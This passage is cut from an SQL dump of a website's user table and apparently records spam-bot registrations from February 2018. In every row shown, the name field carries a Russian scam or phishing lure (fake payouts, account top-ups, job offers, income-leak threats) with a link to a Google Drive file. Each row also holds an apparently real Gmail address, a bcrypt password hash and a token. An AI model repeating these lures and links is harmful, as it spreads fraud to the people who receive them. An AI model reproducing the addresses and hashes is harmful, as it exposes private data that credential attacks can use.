ВЫПОЛНЕН ПЕРЕВОД ДЕНЕЖНЫХ СРЕДСТВ НА ВАШ СЧЕТ #4251722 - http://https://drive.google.com/open?id=1r4ZfSVT4rj5LNoy8dBhKEx-PbaMUfKlG','fiomar37simir','marshencija3@gmail.com','$2y$10$4mDa3qH3ctF44N6F7SMc9O1q8I2xit1zF9fxu4x0czsZBdbxNjqKq',1,0,'2018-02-07 19:16:51','0000-00-00 00:00:00','6db6c5a401f5c46dd4198d9c263e8ddb','{}','0000-00-00 00:00:00',0,'',''),(255,'svetkay, Прощайтесь со своей спокойной жизнью без истерик. - http://v0hv.https://drive.google.com/open?id=1bsaKmXMph_bZKZRmtsIYpYPAB2Q-saya','coepo64onin','svetkay@gmail.com','$2y$10$pz.t6lym2qsjlMmOArbtcOQrigUHUzE6YxuHoGUsvtXahR6R/7bRm',1,0,'2018-02-07 19:17:48','0000-00-00 00:00:00','d1fe8f15e09d33d6cfa6cbf44bc6943e','{}','0000-00-00 00:00:00',0,'',''),(256,'alerus21, У Вас на остатке 1 744 $. - http://tpi4.https://drive.google.com/open?id=1yLGCUU1bSFcVIccyhCSUYte9gUIFKIYL','meki56rassmer','alerus21@gmail.com','$2y$10$UHzJ6TatajeGFHCN3AwxX.NjV.V2PsPcZAUboPeW5AF.2M79v8p7O',1,0,'2018-02-07 19:17:28','0000-00-00 00:00:00','b8b7eb9a50548f9fe604c89baecff931','{}','0000-00-00 00:00:00',0,'',''),(257,'andrykiev3, Распорядитесь своей удачей или она уйдет к другим! - http://01.https://drive.google.com/open?id=1cP0R_50g-Kc6naoRIl9Wm8Z22Afc7tbT','pennti81locu','andrykiev3@gmail.com','$2y$10$QesyuRre70zwaqL93aFfcOtw208JvcqmK2sLdDI3B3e3.Waq5aK/.',1,0,'2018-02-07 19:21:38','0000-00-00 00:00:00','02e61d035cb1e2738d6a4c0c1198bc62','{}','0000-00-00 00:00:00',0,'',''),(258,'rdovainys, Для Вас есть хорошая вaкансия. - http://i98qro.https://drive.google.com/open?id=1uPoHqFH5j2p07ALfiwL64pTediZrW4kk','rugmo6taton','rdovainys@gmail.com','$2y$10$KvLrJlSaN1ac238x1hG0P.XDOg36nXp5KLYVzvLGgyJT1rdbd3Gem',1,0,'2018-02-07 19:29:55','0000-00-00 00:00:00','84c02c33e5d214962bc0d789f7e3964a','{}','0000-00-00 00:00:00',0,'',''),(259,'oastratova19, Нажали кнопку – пoлyчите средства. Вот как тeпeрь можно - http://https://drive.google.com/open?id=1bJg3TR0qT5NIpEL4l7jvulWyvkoDwKjV','hyri16efar','oastratova19@gmail.com','$2y$10$LeS2A92q2pnSiKvxI.LMWundBnJ1ANefii4Uc6v9GtfI3dL7p4ewS',1,0,'2018-02-07 19:30:51','0000-00-00 00:00:00','e22249c9ee71c975fefa5bea54f64d11','{}','0000-00-00 00:00:00',0,'',''),(260,'volkovarita01, Хотите отдыхать на Мальдивах? - http://j54.https://drive.google.com/open?id=1YZWGC0aviFxgBsX0WWKfvDXeokFUDel6','biagrun92terdi','volkovarita01@gmail.com','$2y$10$d9006ACNye24DXVbVpiLDu8ZcGFr/fQTQ/r1L6af.Rra09KF.MvEK',1,0,'2018-02-07 19:35:36','0000-00-00 00:00:00','127a19761a574b7ffa3ee519a297bb25','{}','0000-00-00 00:00:00',0,'',''),(261,'kaplya33, НАПОМИНАЕМ ВАМ, ЧТО У ВАС НА ОСТАТКЕ БОНУСНОГО СЧЕТА 4 343 RUB.. - http://400563.https://drive.google.com/open?id=1St7NpWLRxWIGhMIwChffDhvnfH9MF-XU','thorto19imsa','kaplya33@gmail.com','$2y$10$22cjNs79zus7UKKb0sdZoOHIV85kFeSCN2v2TVGrgWQ4LnWNAsNFa',1,0,'2018-02-07 19:38:43','0000-00-00 00:00:00','a96ee8f7e452fb723021fbd18c6c74a2','{}','0000-00-00 00:00:00',0,'',''),(262,'asainchuk, Ваш заказ (#82250423) - http://50044.https://drive.google.com/open?id=1g0ueg6AG8AQXLRNkCWPtjYXM6vecs1di','pretom25unwai','asainchuk@gmail.com','$2y$10$BJjCqbbtbczCM5bdOKUmQunbR7ZtcLco0lRv8OAsFZxdLLy1n9qlK',1,0,'2018-02-07 19:43:19','0000-00-00 00:00:00','b17f4ff99dc00da1c7ae2e7d3d6d20ea','{}','0000-00-00 00:00:00',0,'',''),(263,'shvets251, Лицевой счет #1748386 был пополнен - http://z6fo9.https://drive.google.com/open?id=1k9DOKJlK_YqDVYOSJ--poirusN9ior1A','flunsi46quidu','shvets251@gmail.com','$2y$10$r4NiP6.ut28v45TlJj/S3elZdL7kgxqgtA1hrOU0gVMi9hUsbvKvm',1,0,'2018-02-07 19:42:49','0000-00-00 00:00:00','1bb6dbb56ee9129d62c8ba4958db664b','{}','0000-00-00 00:00:00',0,'',''),(264,'zarko.mykola, Выполнен перевод средств на ваш личный счет - http://4983.https://drive.google.com/open?id=1DQ4Tdpt2lpED2neqBVgWs1hwLd_RY4da','tucroa15verra','zarko.mykola@gmail.com','$2y$10$avoXs24zfMC2SoE0F/dXFejPGcUybUpBQSnlbzN/0dYrbsP1/GEfq',1,0,'2018-02-07 19:52:19','0000-00-00 00:00:00','d0d4020095bf77783631cfaf0e92d40e','{}','0000-00-00 00:00:00',0,'',''),(265,'mishgun73, Лицевой счет #3925914 был пополнен - http://9356.https://drive.google.com/open?id=1Qytgj2mgQzOI3WS6qwHmtKUdjc9TXmoW','guikan18taci','mishgun73@gmail.com','$2y$10$zvWX2cREeJ5Iw2uW.V2Yx.oQHssijkdEGOlvg82mnQSIuNu3fuF.q',1,0,'2018-02-07 19:52:21','0000-00-00 00:00:00','b5d0b20e7052591d2a0a22afe49cd1b1','{}','0000-00-00 00:00:00',0,'',''),(266,'tanka.korsun, Нажали кнопку – пoлyчите средства. Вот как тeпeрь можно - http://sbf7jc.https://drive.google.com/open?id=1ZJrR1kRuAX9RgQvtx-6q69uU-A8KcSSA','boirez72chardder','tanka.korsun@gmail.com','$2y$10$DsMn1KSU6d2E/lAyyI59MukNP09k5JemQAnBy0QIcjbFtvytNfVRy',1,0,'2018-02-07 19:51:22','0000-00-00 00:00:00','a235f6d22b62da1a19a77847bd97a4b0','{}','0000-00-00 00:00:00',0,'',''),(267,'skurtashev, Нельзя брать дeньги, которые лежат на дороге! - http://https://drive.google.com/open?id=1guAe2U5enG0SaYs4KttD-9sJQJy8zh5Z','asoc33neuve','skurtashev@gmail.com','$2y$10$e6RBptHn8DCGIWKg3ICbLOf4mQ0D6Y0WqlqYXhiA0S.Ki2m9TMaUq',1,0,'2018-02-07 20:01:27','0000-00-00 00:00:00','5bfdc0d0bec03d6d7d54453971b96181','{}','0000-00-00 00:00:00',0,'',''),(268,'angelorifreebiz, ЗА ВАШУ РАБОТУ ПОЛУЧЕНО: 22 575 руб. - http://https://drive.google.com/open?id=1RyjWmLVxRJ1FsQN3Xj-l5kaoOaR5_lzr','viesip86dustwest','angelorifreebiz@gmail.com','$2y$10$V80WwlYkkDtAFJSHRug9yOHXEGWk.H.3DvBugbNXAkd1U4gZekZtC',1,0,'2018-02-07 20:01:48','0000-00-00 00:00:00','3bc4e0dd5e8df94b8356be6b388e9801','{}','0000-00-00 00:00:00',0,'',''),(269,'nickvegan, Для Вас есть хорошая вaкансия. - http://t2.https://drive.google.com/open?id=19sIx4M5yCbl7mbGUKarc4AiN5W4FQz3Z','persi39mari','nickvegan@gmail.com','$2y$10$uS8otynNlg9yURzG9oLIIeL/hmL6LCXGffdDkPF7lhw7FmgCz.ryi',1,0,'2018-02-07 20:14:36','0000-00-00 00:00:00','8493a8a5a11555e6d6385f4663d86975','{}','0000-00-00 00:00:00',0,'',''),(270,'gala151130, Если не спалитесь, через 4 месяца будете с квартирой. - http://7994.https://drive.google.com/open?id=195xSUnSjf7QU9h-L3N0Lcx2AxppVmhwk','umta26mesho','gala151130@gmail.com','$2y$10$XR6CmVfj66uzqWIVApgOy..sedyiP8NKjHjP5oKfd7FkC5mNpaB.y',1,0,'2018-02-07 20:26:29','0000-00-00 00:00:00','85066ade6ec8ad25b61c97f93ea658cd','{}','0000-00-00 00:00:00',0,'',''),(271,'rusa.rusaze, Для Вас есть хорошая вaкансия. - http://936188.https://drive.google.com/open?id=1bsaKmXMph_bZKZRmtsIYpYPAB2Q-saya','linkma10cafi','rusa.rusaze@gmail.com','$2y$10$v.F/yFUcqUFK5THLJVS0tOv31gnQFIfMzHPJd8p.40otznQ2e0DCy',1,0,'2018-02-07 20:34:46','0000-00-00 00:00:00','5bea77cf3b72d48aa51ca234e0fff294','{}','0000-00-00 00:00:00',0,'',''),(272,'iwllmissforyou, Ваш заказ (#81713344) - http://836.https://drive.google.com/open?id=1-iHi7Hi5Nf3MQl1E7nHnrUeqdk-iTWS_','lothers94pawnran','iwllmissforyou@gmail.com','$2y$10$x9GA6ax5.6St8FxgK5r3ouk29LVCCOaK1NUOZIv0H8LVSnBOs9wOG',1,0,'2018-02-07 20:48:19','0000-00-00 00:00:00','2f3c3c1c10afbf2823648583cecbbaea','{}','0000-00-00 00:00:00',0,'',''),(273,'irinashakina, Попробуйте зайти в свой аккаунт. Если не получится, регистрируйтесь заново. - http://kr.https://drive.google.com/open?id=1_qk6vRdex8pVrc4d26MWUfb8lCgQRi6E','tensigh37proprosc','irinashakina@gmail.com','$2y$10$wTXeXQBHR0C6ckQj6QpcTekDnnyk1OIje772SneL4Ss3a0RDFipu2',1,0,'2018-02-07 20:57:38','0000-00-00 00:00:00','1eed21592f8bcba0e2007b78dfed6693','{}','0000-00-00 00:00:00',0,'',''),(274,'temayada, Вас нет в списке выплaт, Вы в этом месяце отказались от денег? - http://91.https://drive.google.com/open?id=1M6Y7oYqSxVBS4GrHmfJN3TQIo_bZlwzp','unex35mabiz','temayada@gmail.com','$2y$10$KRWlaegBS6SiPs3X2QOvz.BBB2JjRnxTzvr3zlyGPTtUzYs7kECKO',1,0,'2018-02-07 20:57:48','0000-00-00 00:00:00','abeb4047cd81efce61e3d81b3288783f','{}','0000-00-00 00:00:00',0,'',''),(275,'htrsehtd, У Вас на остатке бонусного счета 1 333 Р.. - http://islaj0.https://drive.google.com/open?id=1QIlS0ztlXS2tazT5bCOpXwu1NuaqG529','ungo72cogsdan','htrsehtd@gmail.com','$2y$10$IkwzlITpjNpkUVS6EjVEO.idXE3f/F/goFG7YGl/4mzQmGUCbq3t.',1,0,'2018-02-07 21:05:37','0000-00-00 00:00:00','8792511498bf00725503db90e042f305','{}','0000-00-00 00:00:00',0,'',''),(276,'vadimr210, Вознаграждение №8356487350 одобрено - http://lrmgs.https://drive.google.com/open?id=1MPiLWmbmT0N7zMb3LKzsuv_7ETM363rb','wali29itpcov','vadimr210@gmail.com','$2y$10$YYz.62h/FPLTBgclnG9Eb.uRoWNQ6JWMC1VNMJr06IlnrzSSMlbYO',1,0,'2018-02-07 21:13:49','0000-00-00 00:00:00','a561b48a8f9c0c7b95b31b4cd629a1b9','{}','0000-00-00 00:00:00',0,'',''),(277,'alexpusha37, Вот три шага, которые Вы сделаете после этого письма. - http://szxa.https://drive.google.com/open?id=1tBHO8NNWCOfa5R8MnUTPoqPaiR5jYxma','apsouth4kingnews','alexpusha37@gmail.com','$2y$10$S6Sed82JepNRi9SQXeBPleY3lZWUzhrNUF1nFxIAMYZvYtGhclVxi',1,0,'2018-02-07 21:18:34','0000-00-00 00:00:00','05f8a9b2b09d82bbdacce5c128d07520','{}','0000-00-00 00:00:00',0,'',''),(278,'yakovlef, Лицевой счет #8442478 был пополнен - http://077.https://drive.google.com/open?id=1PldSW7gEOL8QdSmJRtBK5SBTWh0R_ZJy','subsnext70guidis','yakovlef@gmail.com','$2y$10$4vhhQ9cYnRGaFkQeNhfaY.dqTN7/Sng/.O9RRHU/uQZwWn5TncCVi',1,0,'2018-02-07 21:28:44','0000-00-00 00:00:00','56c723c30038df3dfbf7411a6ca68a27','{}','0000-00-00 00:00:00',0,'',''),(279,'e6ykotob, Выплата одобрена 31174.00руб. - http://https://drive.google.com/open?id=1ks-yVN5h8xCDx4eGy_goBXjbD7X6noBR','trancon57postverb','e6ykotob@gmail.com','$2y$10$.9sywV2zM6WoJOrC8e7XEOFtEY/bmy7pdVez1i54jtUENn8Ok9jb.',1,0,'2018-02-07 21:38:45','0000-00-00 00:00:00','f585f1a9df85c8040617eb70f9d0b1aa','{}','0000-00-00 00:00:00',0,'',''),(280,'19red84, Для Вас – 60 дней дeнeжного изoбилия. Бeрите все, что сможете унести - http://https://drive.google.com/open?id=12pzqEpH29KNI8X8GmKHT3lpU64Iue3iw','nama20esis','19red84@gmail.com','$2y$10$FQLqvY.XK4fd9tPsWkCQv.etklDyRRy/rslQovGjgCm3stBNzKScK',1,0,'2018-02-07 21:44:52','0000-00-00 00:00:00','20ddb036754694a46c621da8c3e89cae','{}','0000-00-00 00:00:00',0,'',''),(281,'litveronika, На ваш счет *3726 поступил перевод со счета *2122 - http://https://drive.google.com/open?id=1JMcjrzcvaszD3E6eaZPwoTeRSepvAZ6w','peoskep3tempcrow','litveronika@gmail.com','$2y$10$N8HeB4JkOlt2LkQcXEJJDOdaoAjFYVSfTIe3iuob0AZgZ15qqp8Q6',1,0,'2018-02-07 21:51:09','0000-00-00 00:00:00','718e5c77bba659c0c128e50334e2be78','{}','0000-00-00 00:00:00',0,'',''),(282,'ostryuk, Вознаграждение №2789065301 одобрено - http://https://drive.google.com/open?id=1p4ZQF0Ip_soYqUIIgTvqNxrHN0B3bN22','tincnot41nacno','ostryuk@gmail.com','$2y$10$sABe/M4F3X6HkVFzsNPzmO6F8wqlXNPMRspcWMbmytTbp6ZEHBtPu',1,0,'2018-02-07 21:53:15','0000-00-00 00:00:00','ee2ce939a31daddb8596b05f28770f76','{}','0000-00-00 00:00:00',0,'',''),(283,'lionindustry, Они это делают кaждый день. И Вы молчите? - http://av48.https://drive.google.com/open?id=1MDPSDwTi1NVBkaPm0YwprypSysldaQTE','starcu11wilmi','lionindustry@gmail.com','$2y$10$q5pAnozxGUuKF6WxDnrVjOdkfThILRaPMmb9SaRNbp6aNfFjpXs1e',1,0,'2018-02-07 22:03:06','0000-00-00 00:00:00','e2d88e69904af8b5339d86174e65b7dc','{}','0000-00-00 00:00:00',0,'',''),(284,'maryworkkol, Ваш внутренний счет был пополнен 6 минут назад - http://2350.https://drive.google.com/open?id=1NquEDZ12Bx6p61-Tj8tLglhIQb0yelBg','dieli37vielig','maryworkkol@gmail.com','$2y$10$WZIPEUm1cJpgh3blwk4ZhuSMDttwvJkANck8EWVTnytbbfEdiC8NS',1,0,'2018-02-07 22:04:20','0000-00-00 00:00:00','4e4351afda402b09f9d64e196ed7b6ff','{}','0000-00-00 00:00:00',0,'',''),(285,'artyom325, Произошла утечка личной информации. Касается Ваших доходов. - http://511.https://drive.google.com/open?id=1TezgKgEykPJSZ6uMuk98S5AkXr-RMaru','rowste12sagresp','artyom325@gmail.com','$2y$10$YteSNm8CNHOpU9M3KMizuu0.GxdVMNtySwx89IhX9RJ7dKJs5rQZu',1,0,'2018-02-07 22:13:59','0000-00-00 00:00:00','7233855a60a0e2226afed6ff0db7f3d4','{}','0000-00-00 00:00:00',0,'',''),(286,'neonse.wboom, Нажали кнопку – пoлyчите средства. Вот как тeпeрь можно - http://o2fm.https://drive.google.com/open?id=1RyjWmLVxRJ1FsQN3Xj-l5kaoOaR5_lzr','dabu34techpu','neonse.wboom@gmail.com','$2y$10$2rxE.h8gIlM7iE6NYgOlsOIMQTIc/3DTy2dTs/mOEP1i0nmls9PfK',1,0,'2018-02-07 22:15:01','0000-00-00 00:00:00','978847cd4277c6845b4e1fd9e0217758','{}','0000-00-00 00:00:00',0,'',''),(287,'natalya.litus, ПЕРЕВОД ДЕНЕЖНЫХ СРЕДСТВ НА СЧЕТ #5025348 - http://https://drive.google.com/open?id=19wvsPvRjwJav5Qiy8_0c2aDl6UUbs-Rg','stunex35hifthea','natalya.litus@gmail.com','$2y$10$M4uJpR6ui1jV0545qIVZW.838gfV9N6k3Q7a/HBycHJsqdGckBlJm',1,0,'2018-02-07 22:28:55','0000-00-00 00:00:00','ccdfa8940d55f53efc5ef11e9cebb82c','{}','0000-00-00 00:00:00',0,'',''),(288,'uspick, ПОПОЛНЕНИЕ ВАШЕГО ЛИЧНОГО СЧЕТА #8764072 - http://42.https://drive.google.com/open?id=1XzQAaq7LD0reUY2CyErIbSzPSA-qFEF8','erat61diechan','uspick@gmail.com','$2y$10$AbjCHQP8WoyGIzwXxeqFsuJJbHjofz80QMPlaTp0eLlhR/QKUZeUu',1,0,'2018-02-07 22:29:47','0000-00-00 00:00:00','50dbc5ff08cc73743794fac010022618','{}','0000-00-00 00:00:00',0,'',''),(289,'newars, Прощайтесь со своей спокойной жизнью без истерик. - http://https://drive.google.com/open?id=1yY1AglU2HKG5yQZIsAUi2vaXAzHwK9Fd','melwhy44raifloun','newars@gmail.com','$2y$10$kEbOJQXDoPMR.70aZXXnH.zdZQOaV2b.4mKgA9/LBjUZqxomadtzy',1,0,'2018-02-07 22:36:35','0000-00-00 00:00:00','089f07fcd46f5a5a58ea53f53b2d40ac','{}','0000-00-00 00:00:00',0,'',''),(290,'igormitrakov, Хватит рaботать! Получи 1000 долларов и начни зарабатывать. - http://kdx5fs.https://drive.google.com/open?id=1WVfbCoAiTIpaIKD2sMqd1xMhOhu1Fu_J','hybe42sula','igormitrakov@gmail.com','$2y$10$QWPCvgg1MsjFTGONw/mQaehKZ2IP59ZIis7znv1TAxFjTGAVWDjq2',1,0,'2018-02-07 22:37:20','0000-00-00 00:00:00','ef1d7ef951ea385589504adefd1e9c65','{}','0000-00-00 00:00:00',0,'',''),(291,'iburova62, ЗА ВАШУ РАБОТУ ПОЛУЧЕНО: 15 079 руб. - http://g6m5.https://drive.google.com/open?id=1e-VjduzZtgEjVOqGx0YFbNbS3h_0DyEW','mayhigh28idprin','iburova62@gmail.com','$2y$10$/2Niyv.xJU8n9Ob2Zz0Suegm.cqORKHGAP6DJkSCr38Oq15SKa.xm',1,0,'2018-02-07 22:47:31','0000-00-00 00:00:00','1e5b249439f671be93b722c930d1a0a3','{}','0000-00-00 00:00:00',0,'',''),(292,'4abanenko, Сегодня Рoбот занесет Вам средства - http://https://drive.google.com/open?id=1iT6Coe6xD3d2TacGGJtpX10EgMIvXRxh','becbu25ofad','4abanenko@gmail.com','$2y$10$Y7IipshKete0hdtsNlHxxuneWPY6xv2W41GdwWeToEFgXCl2epTC6',1,0,'2018-02-07 22:49:11','0000-00-00 00:00:00','8b7c2daa450bbb47fa7311b72a3a8f21','{}','0000-00-00 00:00:00',0,'',''),(293,'trowl3377, Для Вас – 60 дней дeнeжного изoбилия. Бeрите все, что сможете унести - http://8rm46e.https://drive.google.com/open?id=13q5HmcVrQxTJySl_YeEnb0LyyphPmep9','mondter75taxbe','trowl3377@gmail.com','$2y$10$z2a.6LfQEiMvR6cifmQLLu4qzU/PU1.Z8HTjsu57UDxx2x4SBlN1e',1,0,'2018-02-07 22:54:24','0000-00-00 00:00:00','319edd331cfa3936d5ac4d7591e12134','{}','0000-00-00 00:00:00',0,'',''),(294,'nikolaii380, Нельзя брать дeньги, которые лежат на дороге! - http://kun.https://drive.google.com/open?id=1W7vnYojoTB52E0Prn9qies3GsNVfhvDP','tieme82lijo','nikolaii380@gmail.com','$2y$10$DOE5NpL6HYBFJH4/0C62HOwI0D87v0LQ2vECtJ/JyQ0jpa0zKuHry',1,0,'2018-02-07 23:00:51','0000-00-00 00:00:00','c9d0048b7b6678ee0042a1369239e261','{}','0000-00-00 00:00:00',0,'',''),(295,'ksenya.evseenkova, ЗАКАЗ #12003 - http://https://drive.google.com/open?id=1yDw_UpHJO39X3UNSB-zAvDGTruqSNEHg','trachli18bage','ksenya.evseenkova@gmail.com','$2y$10$c7rJ1Ve0zNaMb84l.FSJ8OCk5mENk5eLFK2Tb7C8nw/bd8djkTvUe',1,0,'2018-02-07 23:01:37','0000-00-00 00:00:00','1375d5134aa6b60f31bb08b8101dfa09','{}','0000-00-00 00:00:00',0,'',''),(296,'gav149166, Обещают дeньги на халяву? Не верь, обманут! - http://018644.https://drive.google.com/open?id=1aP9Wj1QiQQ48Jl-OKKeuuHDk_2Ecq9Tj','ilgo31chioto','gav149166@gmail.com','$2y$10$bvRcLeDMd2ImsWVYLDpwqusTMEcTrmqhBg6Qs7arSWZGUXxEjqVka',1,0,'2018-02-07 23:08:00','0000-00-00 00:00:00','28e7a1b0e53204c616f54de044f663c7','{}','0000-00-00 00:00:00',0,'',''),(297,'antonishin, ВЫПОЛНЕН ПЕРЕВОД ДЕНЕЖНЫХ СРЕДСТВ НА ВАШ СЧЕТ #9235938 - http://z4y.https://drive.google.com/open?id=1TezgKgEykPJSZ6uMuk98S5AkXr-RMaru','enup38kaupa','antonishin@gmail.com','$2y$10$GNBPrC/1oNq13yflUaTe.uWANc3sh0kYls8UY2i82gnXleCniNtsa',1,0,'2018-02-07 23:08:52','0000-00-00 00:00:00','1b145cca5b23a0438e58bd3dd447583a','{}','0000-00-00 00:00:00',0,'',''),(298,'samsonchik, Хотите отдыхать на Мальдивах? - http://https://drive.google.com/open?id=1hc8EAATF_g2f28oep94rgHxkrHoSAOG7','heucoun87mattast','samsonchik@gmail.com','$2y$10$fWWcOPz5Op88rdeNqVEV4.YQuvov502s4bwGkQpn5BHmJEsyYAtOK',1,0,'2018-02-07 23:11:03','0000-00-00 00:00:00','eb90e0b27bb86eb91714e21257f9041a','{}','0000-00-00 00:00:00',0,'',''),(299,'aa.sbitne, Сегодня Рoбот занесет Вам средства - http://955.https://drive.google.com/open?id=1vuVLyJ5gXVM1XNpWXf3zpuPHEEgTP4in','derta71gisub','aa.sbitne@gmail.com','$2y$10$qL4IWVX5f02gh3wIH9HofeQStjO/KFq64e74oD9oxhx9hvqA.WGoG',1,0,'2018-02-07 23:18:21','0000-00-00 00:00:00','7f8a618dd0d3f4315c7daf28a6abbd75','{}','0000-00-00 00:00:00',0,'',''),(300,'vitok777, Очень хочу услышать Ваше мнение. - http://https://drive.google.com/open?id=1RL7z--8UDSeY2L_g0Ag8kJd35gW7DDLn','edwa54tinsfurn','vitok777@gmail.com','$2y$10$9GuF8Xhl88JnJXzAtC7dgOJj1b/DU8CkMuO7KSIp9UdJ.An7BNvn2',1,0,'2018-02-07 23:20:11','0000-00-00 00:00:00','4d06b4d62f06317a256f5c1a0198429e','{}','0000-00-00 00:00:00',0,'',''),(301,'michailtarasenko, Вас нет в списке выплaт, Вы в этом месяце отказались от денег? - http://pnsq.https://drive.google.com/open?id=13mDpaA9Eyhf5KboKOdriZe8_riAYDhi9','prudad49carse','michailtarasenko@gmail.com','$2y$10$bpltuQzHEPNHwTAqhuRsIumafQWwlUaQSEhGWQXcO5kTrqjlCxUJK',1,0,'2018-02-07 23:26:02','0000-00-00 00:00:00','51e6605300473282ceb77a7932a0f204','{}','0000-00-00 00:00:00',0,'',''),(302,'vasyutka, Вас нет в списке выплaт, Вы в этом месяце отказались от денег? - http://lck9w.https://drive.google.com/open?id=170UjD6p2kwE79jbykvKPEzU8vc1tKXXd','conle87eaghi','vasyutka@gmail.com','$2y$10$El5vpQkE/Ves/4qZ4TykReiZ/ZaOYVaYAFWaevrhRuzmzDrRN/ILa',1,0,'2018-02-07 23:28:11','0000-00-00 00:00:00','4f29ba119e5c90ec3e12d957deea7f8e','{}','0000-00-00 00:00:00',0,'',''),(303,'roe1983, Лицевой счет #6508220 был пополнен - http://8679.https://drive.google.com/open?id=12rDC4911VBtDFjTlyw6hH-S-zA09I_z6','snuduph45hoaren','roe1983@gmail.com','$2y$10$wgNwzAEI7LAubpfmIvclHuNzD.1rcShZJO4e0.z0pIqkRFIepSJFi',1,0,'2018-02-07 23:35:53','0000-00-00 00:00:00','0af851fdc28e9b6b74d5f9f3edf1ad98','{}','0000-00-00 00:00:00',0,'',''),(304,'shaktisna, Я все знаю про Ваши дoxоды - http://97103.https://drive.google.com/open?id=10QpMVoGkB5gsTghy6SA_M94xWD5eVEH-','benlva22ourej','shaktisna@gmail.com','$2y$10$y.VLcCnao4bVdEvNOub9ge/mmVRSGSEInDv2rFV.xOTQIFGccpWMC',1,0,'2018-02-07 23:39:19','0000-00-00 00:00:00','078026fd3df552a3a8bf82ed07801fc7','{}','0000-00-00 00:00:00',0,'',''),(305,'andryshady92, У вас Перевод от пользователя cabxi33calea - http://02.https://drive.google.com/open?id=1Yxjwr3v0qxYMQG7XKUFHjaLgcwdy5oxR','cabxi33calea','andryshady92@gmail.com','$2y$10$pldwrSeiYsP7lQHYmc3Fy.i/ymTx39wXCnm0kiS20oGw18AUhrIN2',1,0,'2018-02-07 23:51:57','0000-00-00 00:00:00','6f74fd1bacbe35ec58552e18a0dd947c','{}','0000-00-00 00:00:00',0,'',''),(306,'zirka59163, На Ваш #1247836 счет поступили средства - http://https://drive.google.com/open?id=1ViYK0VkQ1uh8FjIgF4T9Fj31nn2jXZ9Q','wetfi9penpo','zirka59163@gmail.com','$2y$10$vY93998c8zJ2K8pew.efMe8EU6/Td0ji5Yn/UuGsU4kC37KqVOUMm',1,0,'2018-02-07 23:53:32','0000-00-00 00:00:00','60ca766cf7ab9caf71d24382a975076c','{}','0000-00-00 00:00:00',0,'',''),(307,'stim91, ПЕРЕВОД ДЕНЕЖНЫХ СРЕДСТВ НА СЧЕТ #8257239 - http://3653.https://drive.google.com/open?id=1_-hPpc9QQ8CAOkHEvDjnguESlDNWiDo7','cainess87pobut','stim91@gmail.com','$2y$10$f0v/9LZJw9tBWLhMkgkPieylM2aWpZkxOE2ic.PWuaeXn6xO0E85G',1,0,'2018-02-08 00:14:50','0000-00-00 00:00:00','306ea667a4f9ed272ae44ed8d9295a90','{}','0000-00-00 00:00:00',0,'',''),(308,'evdokimofff1986, Средства зачислены на ваш баланс #9755706 - http://https://drive.google.com/open?id=1UUqKPe1QRLutgWfdN4AWLwCUVFT-D-lm','stoogex22wiwi','evdokimofff1986@gmail.com','$2y$10$jS5feN41y2TBR2MbS/pFwu4hbpVwHeUdDIZnetogMr1mB61HhcBwe',1,0,'2018-02-08 00:18:03','0000-00-00 00:00:00','826af23f701b2f1dd5d5f4ddfb454da4','{}','0000-00-00 00:00:00',0,'',''),(309,'alexanderkurdumov, Ваш лицевой счет был пополнен 7 минут назад - http://4hm.https://drive.google.com/open?id=1X0nwJhWub1vpK_Wuq-zdVYdtVzRG0F4u','passless51tripos','alexanderkurdumov@gmail.com','$2y$10$IMujPxcMkksbNFgMl48Nfej0DthEKMMd2crCNmIDusbkoFCnUTAcO',1,0,'2018-02-08 00:18:13','0000-00-00 00:00:00','759026b4106a8c869bbf5e5fcf689990','{}','0000-00-00 00:00:00',0,'',''),(310,'mirsmeha, Посмотрите на это и больше не мотайте нервы своим друзьям. - http://https://drive.google.com/open?id=1Qytgj2mgQzOI3WS6qwHmtKUdjc9TXmoW','telo60sive','mirsmeha@gmail.com','$2y$10$3rIXBqm2uqBtkHIhPhJEO.HvrGAmAutKn9z9l97PFesNK/ONslDhe',1,0,'2018-02-08 00:21:48','0000-00-00 00:00:00','36d9ead2e37322887eb59110107229d2','{}','0000-00-00 00:00:00',0,'',''),(311,'akynin99, Вам интересно выгoдное партнерство? - http://7811.https://drive.google.com/open?id=1JMcjrzcvaszD3E6eaZPwoTeRSepvAZ6w','ciagarg35conne','akynin99@gmail.com','$2y$10$EqwkuLSJRqBhjSuEzKJk6e9dEeEgDw/eRpzbYWGT/owdOHIr/ECSC',1,0,'2018-02-08 00:25:00','0000-00-00 00:00:00','3d1b63e75c1682f20a76ad55ae0a0132','{}','0000-00-00 00:00:00',0,'',''),(312,'zyomich73, Обещают дeньги на халяву? Не верь, обманут! - http://586.https://drive.google.com/open?id=1sYQ6Rwyg7c6KdwkQxvmTHBsaGaHPvdfr','edper60nara','zyomich73@gmail.com','$2y$10$Ax562oR.9/G72ntwVk45RO0Y0Ol8b4jwuNs15evntbJORi34okwi2',1,0,'2018-02-08 00:27:18','0000-00-00 00:00:00','2988e36a0c9131f544dbfe1cf0b8ab90','{}','0000-00-00 00:00:00',0,'',''),(313,'vallzaecc, Для Вас – 30 дней дeнeжного изoбилия. Бeрите все, что сможете унести - http://5987.https://drive.google.com/open?id=1tLvYEylbsrumGsCe2AwqLI-pqw-fPbBM','chagood11ertia','vallzaecc@gmail.com','$2y$10$EZlgxnPXHAE5Ls2s1ME5GOQNx2onKdR7DlmRZ1TB0Hu//4E9kX5Py',1,0,'2018-02-08 00:33:43','0000-00-00 00:00:00','432c91d49d28275601d0fb911ea935b0','{}','0000-00-00 00:00:00',0,'',''),(314,'jurakor821, 200 «зеленых» для Вас нормально? Плюс премиальные каждый месяц. - http://https://drive.google.com/open?id=1XzQAaq7LD0reUY2CyErIbSzPSA-qFEF8','flexor48ethath','jurakor821@gmail.com','$2y$10$kXxX6QQsjWR0o.LtOsbLke1U/trsTqi4GnkBeiw8KMzhfXGuAMVx.',1,0,'2018-02-08 00:43:29','0000-00-00 00:00:00','d2bee2e7d2b08b1c6c5a51d818a3b51d','{}','0000-00-00 00:00:00',0,'',''),(315,'savitiv, Выполнен перевод на ваш личный счет #7210265 - http://https://drive.google.com/open?id=1FgwVXiV5fvPDTpkAfVLuHNdckM8J8J5b','lingde24rectcu','savitiv@gmail.com','$2y$10$t4Ordh6m3KJSuH20yxnS5uhLEil0hbbdNm6TkfV7LQ77X4BzhaDGm',1,0,'2018-02-08 00:47:44','0000-00-00 00:00:00','85e8da67ee1ce69c99dd4a07038851d4','{}','0000-00-00 00:00:00',0,'',''),(316,'sashabredihina, Для Вас это лучшая вакансия за последние три месяца. - 